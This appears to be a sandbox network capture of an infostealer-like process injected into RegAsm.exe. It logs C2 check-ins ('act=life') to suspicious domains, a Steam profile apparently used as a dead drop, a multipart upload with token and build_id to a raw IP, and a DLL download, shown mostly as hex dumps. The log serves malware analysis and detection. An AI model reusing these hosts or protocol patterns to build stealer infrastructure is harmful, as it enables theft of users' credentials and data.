2024-10-02 07:41:40 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: absorptioniw.site
2024-10-02 07:41:40 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 07:41:40 UTC	770	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jo02e9jlkl3gcjcgfu459oo3nc; expires=Sun, 26 Jan 2025 01:28:19 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZuMVurN1EBAwP0M1DIEuTXP588DndsNLiipWKkOOw9snqQ9kHjigij5RC4W12aGSBd38DtJ30YGmXFsg%2Bug9fG2qyFXRTEyGUj2QZb1Og3zKrr9s0rPurvGanavLFGhYG5U5xA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30d274be142c6-EWR
2024-10-02 07:41:40 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:41:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49775	104.102.49.254	443	280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:41 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-10-02 07:41:41 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Wed, 02 Oct 2024 07:41:41 GMT Content-Length: 34837 Connection: close Set-Cookie: sessionid=ce58703ed4eee6a259f8d9b1; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-02 07:41:41 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-02 07:41:41 UTC	16384	IN	Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-02 07:41:41 UTC	3768	IN	Data Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 Data Ascii: <div class="profile_summary_footer"><span data-panel="{"focusable":true,"clickOnActivate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-02 07:41:41 UTC	171	IN	Data Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49776	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:41 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHJEGCAEGIIIDHIEBKEB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 6273 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:41:41 UTC	6273	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 45 47 43 41 45 47 49 49 49 44 48 49 45 42 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 34 33 62 61 63 36 64 36 35 37 35 35 64 61 66 65 61 39 36 66 35 39 35 37 30 62 38 66 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 45 47 43 41 45 47 49 49 49 44 48 49 45 42 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 45 47 43 41 45 47 49 49 49 44 48 49 45 42 4b 45 42 0d 0a 43 6f 6e 74 Data Ascii: ------GHJEGCAEGIIIDHIEBKEBContent-Disposition: form-data; name="token"f43bac6d65755dafea96f59570b8fecb------GHJEGCAEGIIIDHIEBKEBContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------GHJEGCAEGIIIDHIEBKEBCont
2024-10-02 07:41:42 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:41:42 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49777	104.21.16.12	443	280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:42 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: gravvitywio.store
2024-10-02 07:41:42 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 07:41:42 UTC	778	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rr01d72k4obskrsg5o1uj2f7ua; expires=Sun, 26 Jan 2025 01:28:21 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ba6UQ%2Fr8lpLZruO0Gsk3OBztj%2BuF73QP2cCFcof7HZPZBMFbj36A86Wc3aOOEGLPP6d0rMzsalE1AVp3%2FEyzKU99AaYDz8mDIEF1k04qdN96hcUnohpDvDZkG1K3%2BrKtaQKO%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30d34ceb272a1-EWR
2024-10-02 07:41:42 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:41:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49778	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:42 UTC	192	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:41:43 UTC	264	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:43 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Wednesday, 02-Oct-2024 07:41:43 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-10-02 07:41:43 UTC	16120	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-10-02 07:41:43 UTC	16384	IN	Data Raw: d3 b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-10-02 07:41:43 UTC	16384	IN	Data Raw: 24 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 Data Ascii: $@:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhS
2024-10-02 07:41:43 UTC	16384	IN	Data Raw: 83 f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!\|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB\|$-tDt$pV9"WfD$hL$lt$hT$5
2024-10-02 07:41:43 UTC	16384	IN	Data Raw: 89 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e Data Ascii: L$ D$$;\|D$;sD$D$ T$$"$D$k;l$$\|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP\|$4L$ l$8j\|$L$8QW@L$,9L$<\|
2024-10-02 07:41:43 UTC	16384	IN	Data Raw: 8b 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|$2@3@f@D$VF@:'\|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
2024-10-02 07:41:43 UTC	16384	IN	Data Raw: 24 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: $td\|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
2024-10-02 07:41:43 UTC	16384	IN	Data Raw: fe ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 Data Ascii: _^][YVt$W\|$FVBhtw7t7Vg_^jjjh,g!t$
2024-10-02 07:41:43 UTC	16384	IN	Data Raw: 1c 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^\|$u\|$u_^3ARt$t$PA8tuL$
2024-10-02 07:41:43 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW\|$mw<(6XvutT9 $tB8$tPh $VD $)$
2024-10-02 07:41:45 UTC	16384	IN	DELETE FROM %Q.'%q_docsize' WHERE id=?SELECT sz%s FROM %Q.'%q_docsize' WHERE id=?REPLACE INTO %Q.'%q_config' VALUES(?,?)SELECT %s FROM %s AS T,?,originDROP TABLE IF EXISTS %Q.'%q_data';DROP TABLE IF EXISTS %Q.'%q_idx';DROP TABLE IF EXISTS %Q.'%q_config';DROP TABLE IF EXISTS %Q.'%q_docsize';DROP TABLE IF EXISTS %Q.'%q_content';ALTER TABLE %Q.'%q_%s' RENAME TO '%q_%s';CREATE TABLE %Q.'%q_%q'(%s)%sfts5: error creating shadow table %q_%s: %sid INTEGER PRIMARY KEY, c%did INTEGER PRIMARY KEY, sz BLOBid INTEGER PRIMARY KEY, sz BLOB, origin INTEGERk PRIMARY KEY, vDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';SELECT count() FROM %Q.'%q_%s'tokencharsseparatorsL N* Cocategoriesremove_diacriticscase_sensitiveasciitrigramcolrowinstancefts5vocab: unknown table type: %Q [TRUNCATED] r:Y<\|=>MbP?\|^~?9RF??14????K(??? ?333333?-DT!?@@-DT!@!3\|@@@-DT!@@$@4@>@aTR'>@H@cL@Zd;M@Y@fffff^@r@v@@@p@@@@@@A`&A.A@}<A`FASA TAcApAdyAAeAA _B MB@dB/dB0CW4vCCC [TRUNCATED] i" i"$i"0i"8i"Di"Pi"\i"hi" xi"i"!i"i"i"i"i"i"i"i""i"!!i""!i"9"i"?"D!!i"!i"!i"i"i"i"i"i"i"i"j"j"j"j"j"j"j"j" j",j"8j"Dj"Pj"lj"xj"j"j"j"j" k"Dk"#pk"k" k"k"&l"0l"Dl"Hl"Pl"dl"#l"l"l"l"l"l"%,m"$Xm"%m"+m"m" n""0n"(dn"n"n"n"n"!n"o"0o"Ho"lo"!!9"i"i"D!lj"o"__based(__cdecl__pascal__stdcall__th [TRUNCATED] 